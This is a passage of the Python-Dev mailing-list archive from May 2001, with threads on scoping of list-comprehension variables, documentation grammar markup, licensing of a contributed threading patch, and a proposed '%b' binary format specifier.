Please take a look and send comments to doc-sig@python.org; the first page containing these changes is at: http://python.sourceforge.net/devel-docs/ref/identifiers.html The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate. I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definitely lagging behind in CSS support! Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes. From tim.one@home.com Wed May 30 06:51:04 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 01:51:04 -0400 Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: [Fred Drake] > The development version of the documentation has been updated: > > http://python.sourceforge.net/devel-docs/ > > Incremental update for development version of Python (2.2). > > Mostly small updates, but I've worked on new markup for grammar > productions used in the Reference Manual. Currently, only the lexical > productions in Chapter 2 of the manual have been converted to the new > markup and layout. Please take a look and send comments to > doc-sig@python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one.
But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake@acm.org Wed May 30 06:53:23 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one@home.com Wed May 30 08:47:47 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 03:47:47 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley] > ... > However, I've also been shooting myself in the foot a little more > than usual > ... > Because of this, I have frequently found myself debugging the > following programming error: If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one . OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. 
That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names: >>> [repr(name) for name in globals().keys()] ["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"] >>> Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone: >>> globals().keys() ['__builtins__', '__name__', 'name', '__doc__'] >>> It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest. > ... > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names: >>> class x: ... pass ... >>> [1 for x.i in range(3)] [1, 1, 1] >>> x.i 2 >>> This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this: >>> [i for i in range(2) for i in range(2, 5)] [2, 3, 4, 2, 3, 4] >>> That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"? Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today). > ... > Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler? >>> import sys >>> try: ... [i*i for i in xrange(sys.maxint)] ... except OverflowError: ... raise OverflowError("oops! blew up at %d" % i) ... Traceback (most recent call last): File "<stdin>", line 4, in ? OverflowError: oops! blew up at 46341 >>> Or what about: i = 12 def f(): print i return [i for i in range(i)] f() 1. Should "print i" print 12, or raise UnboundLocalError? 2.
Does the "i" in "range(i)" refer to the global i, or is that just senseless? So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new. > I was actually quite surprised with this behavior the first time I saw > it. Me too . > I suspect most other programmers would not anticipate this side > effect either. I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising. Another principled model is possible, where [f(i) for i in whatever] is treated like (lambda: [f(i) for i in whatever])() >>> i = 12 >>> (lambda: [i**2 for i in range(4)])() [0, 1, 4, 9] >>> i 12 >>> That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us . From esr@thyrsus.com Wed May 30 09:00:56 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." 
-- Supreme Court Justice Louis Brandeis From thomas@xs4all.net Wed May 30 12:14:24 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack@oratrix.nl Wed May 30 13:26:39 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply@sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. 
The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley@cs.uchicago.edu Wed May 30 14:49:29 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. 
Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this: a = [2*x for x in s] + [3*x for x in t] I certainly don't conceptualize it as being literally expanded into the following sequence of statements: t1 = [ ] for x in s: t1.append(2*x) t2 = [ ] for x in t: t2.append(3*x) a = t1 + t2 > > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 > >>> > Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner? > > ... 
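David's expansion of a = [2*x for x in s] + [3*x for x in t] into loops can be checked directly. The sketch below is a minimal illustration that assumes a modern Python 3 interpreter, not the 2.1 release discussed in this thread; the names `loop_expansion`, `comprehension`, and `Holder` are made up for the example. The explicit loops rebind `x`, the Python 3 comprehension leaves it alone, and Tim's attribute-target case still assigns to the object:

```python
def loop_expansion(s, t):
    """David's explicit-loop expansion of [2*x for x in s] + [3*x for x in t]."""
    x = "outer"
    t1 = []
    for x in s:
        t1.append(2 * x)
    t2 = []
    for x in t:
        t2.append(3 * x)
    a = t1 + t2
    return a, x  # the for statements rebound x


def comprehension(s, t):
    """The same computation written as list comprehensions."""
    x = "outer"
    a = [2 * x for x in s] + [3 * x for x in t]
    return a, x  # in Python 3 the comprehensions do not touch this x


class Holder:
    pass


h = Holder()

print(loop_expansion([1, 2], [3, 4]))  # ([2, 4, 9, 12], 4)
print(comprehension([1, 2], [3, 4]))   # ([2, 4, 9, 12], 'outer')
print([1 for h.i in range(3)])         # [1, 1, 1]
print(h.i)                             # 2: an attribute target still mutates h
```

Python 3 adopted roughly the function-scope model Tim describes: the comprehension body gets its own scope, so only non-name targets such as `h.i` still have side effects visible outside it.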
> > Just as an aside, I have never intentionally used the iterator > > variable of a list comprehension after the operation has completed. > > Not even in a debugger, when the operation has completed via unexpected > exception, and you're desperate to know what the control vrbl was bound to > at the time of death? Or in an exception handler? > Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-). > Another principled model is possible, where > > [f(i) for i in whatever] > > is treated like > > (lambda: [f(i) for i in whatever])() > > >>> i = 12 > >>> (lambda: [i**2 for i in range(4)])() > [0, 1, 4, 9] > >>> i > 12 > >>> > > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected when I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this: a = (lambda s: [2*i for i in s])(s) However, that's pretty ugly. In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example: a = [_i*2 for _i in t] (although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this). Cheers, Dave From fdrake@acm.org Wed May 30 15:03:13 2001 From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> David Beazley writes: > Maybe everyone else views list comprehensions as a series of > statements (the syntactic sugar for nested for-loop idea). However, I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable. If I see code like this: x = 42 L = [x**2 for x in range(2000)] print x I think it should map to something like this from C++: int x = 42; int L[2000]; for (int x = 0; x < 2000; ++x) { L[x] = x * x; } printf("%d\n", x); i.e., both *should* print "42\n" on standard output. Tim sez: > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 David: > Hmmm. I didn't realize that you could even do this. Yes, this would > definitely present a problem. However, if list comprehensions were I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings). -Fred -- Fred L. Drake, Jr. 
PythonLabs at Digital Creations From gward@python.net Wed May 30 15:36:30 2001 From: gward@python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca> On 30 May 2001, David Beazley said: > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself? Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward@python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry@digicool.com Wed May 30 16:07:12 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. 
IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal@lemburg.com Wed May 30 20:57:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Wed May 30 21:07:37 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID: [Tim] > Note that "the iterator variables" needn't be bare names: [Fred] > I didn't realize this either. You have to get your head out of the docs and read more code . > I'm quite surprised by it, in fact, though I understand (I think) why > it works that way. But was this intentional? I expect so. > It seems like pure evil to me! 
Sometimes it's the bee's knees; for example, >>> digits = range(3) >>> x = [None] * 3 >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits] >>> base3 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]] >>> I've done stuff "like that" often, albeit via the nested-loop spelling. > I'd only expect it to support bare names and sequence unpacking (with > only bare names at the "edge" of all nested unpackings). It's too late to take it away now! Python always worked this way. And it's really got nothing to do with what implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully. From tim.one@home.com Wed May 30 21:22:19 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley, pretty much repeats why he doesn't like the current scheme] I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am . >> >>> i = 12 >> >>> (lambda: [i**2 for i in range(4)])() >> [0, 1, 4, 9] >> >>> i >> 12 >> >>> >> >> That's more like Haskell does it. > Ah yes, well this is exactly the kind of behavior that seems most > natural to me. It's also the behavior that everyone expected went I > went around to the various Python hackers in the department and asked > them about it yesterday. I believe that. > I suppose I could just write this: > > a = (lambda s: [2*i for i in s])(s) > > However, that's pretty ugly. It's too complicated, isn't it? 
In the presence of nested scopes (which are reality in 2.2), a = (lambda: [2*i for i in s])() does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too. > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. I would certainly love to see a fix for > it (I would even volunteer to work on a prototype implementation if > there is interest). I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not. From skip@pobox.com (Skip Montanaro) Wed May 30 21:48:47 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. 
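Python can already give a block a private scope without new syntax: wrap the block in a function and call it immediately, which is the lambda model Tim described for list comprehensions. A minimal sketch, assuming Python 3; `_block` is only an illustrative name, and the function's return value plays the part of "exporting results from the scope":

```python
i = "outer i"  # a name the block must not disturb


def _block():
    # Every name bound here, including the loop target i, is local to _block.
    squares = []
    for i in range(10):
        squares.append(i ** 2)
    return squares  # the only value that leaves the private scope


l = _block()
print(l)  # [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
print(i)  # outer i

# Tim's one-line form of the same idea:
l2 = (lambda: [i ** 2 for i in range(10)])()
print(l2 == l)  # True
```

The price is a function call per block, and assignments inside the helper never rebind module-level names unless they are declared `global`.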
I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson@baltimore.com Wed May 30 22:11:16 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). 
I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg From esr@thyrsus.com Wed May 30 22:28:38 2001 From: esr@thyrsus.com (Eric S.
Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one@home.com Wed May 30 22:30:49 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. From mal@lemburg.com Wed May 30 22:31:06 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. 
Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Wed May 30 22:42:22 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pledge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr@thyrsus.com Wed May 30 22:44:57 2001 From: esr@thyrsus.com (Eric S.
Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S. Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry@digicool.com Wed May 30 22:49:22 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). 
For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one@home.com Wed May 30 22:50:31 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. From fdrake@cj42289-a.reston1.va.home.com Wed May 30 22:51:22 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). 
"Documenting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr@thyrsus.com Wed May 30 23:05:09 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation. That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake@acm.org Wed May 30 23:00:15 2001 From: fdrake@acm.org (Fred L. Drake, 